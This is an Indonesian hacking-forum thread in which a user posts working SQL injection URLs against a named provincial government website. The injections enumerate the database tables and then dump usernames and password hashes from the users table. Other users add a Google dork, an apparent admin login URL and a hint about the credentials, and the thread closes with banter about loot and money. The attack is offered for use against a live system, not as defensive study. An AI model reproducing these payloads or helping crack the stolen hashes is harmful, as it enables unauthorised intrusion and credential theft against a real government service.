hole di http://bantenprov.go.id/ untuk sqli

[cyber_criminal]

thread ini saya buat untuk menggantikan postingan saya tentang sqli di http://www.nexian.co.id/,
ok langsung aja, karena bug sqli di situs di http://www.nexian.co.id/ udah di patch maka saya coba nyari situs yg lain, terus ketemu deh bug sqli di http://bantenprov.go.id/

ini dia holenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=6932'

trus saya injeksi, dpat deh isi tablenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database%28%29--

ini isi column dari table pengguna

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--

dan ini dia hasilnya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20pengguna

tapi sayangnya saya belum dapat login pagenya dan hashnya tidak berhasil saya crack, tolong bantuannya ya
:kaca: :kaca: :kaca:

[3xtr3m3b0y]

Search with Google using this keyword:
login site:bantenprov.go.id

[cyber_criminal]

hashnya sulit di crack mas

[win32error]

monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

[3xtr3m3b0y]

monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Code: Select all

$nslookup banten.go.id
Non-authoritative answer:
Name:	banten.go.id
Address: 69.175.104.74

$nslookup bantenprov.go.id
Non-authoritative answer:
Name:	bantenprov.go.id
Address: 118.97.113.84

Jumping machine to machine...???
Itu cmn di redirect dari web lama ke yg baru

[win32error]

jadi gitu to ... :circle:

[cyber_criminal]

terima kasih atas pencerahannya,
:malumalu: :malumalu: :malumalu:

tapi hashnya masih belum berhasil saya crack
:kaca: :kaca: :kaca:

[Digital Cat]

wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

[cyber_terror1st]

wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:

[juara1]

wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:

kalo ada duitnya c monggo2 aja .. hehehehe :ngakak: :ngakak: